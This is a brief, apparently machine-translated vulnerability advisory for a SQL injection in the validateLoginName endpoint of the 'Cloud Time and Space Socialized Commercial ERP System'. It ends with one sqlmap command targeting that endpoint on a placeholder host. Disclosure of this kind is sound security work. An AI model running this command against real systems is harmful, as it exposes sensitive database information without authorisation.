Cloud Time And Space Socialized Commercial Erp System Validateloginname Sql Injection Vulnerability
Cloud Time And Space Socialized Commercial Erp System Validateloginname Sql Injection Vulnerability
Cloud Time and Space Socialized Commercial ERP System validateLoginName SQL Injection Vulnerability
Vulnerability Description
Cloud Time and Space Socialized Commercial ERP system has SQL injection vulnerabilities, and attackers can obtain database sensitive information through the vulnerability.
Vulnerability Impact
Cloud and Space-Time Socialized Commercial ERP System
Network surveying and mapping
Vulnerability reappears
Login page
Verification vulnerability using SQLmap
1
sqlmap -u "https://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin"
This post is licensed under CC BY 4.0 by the author.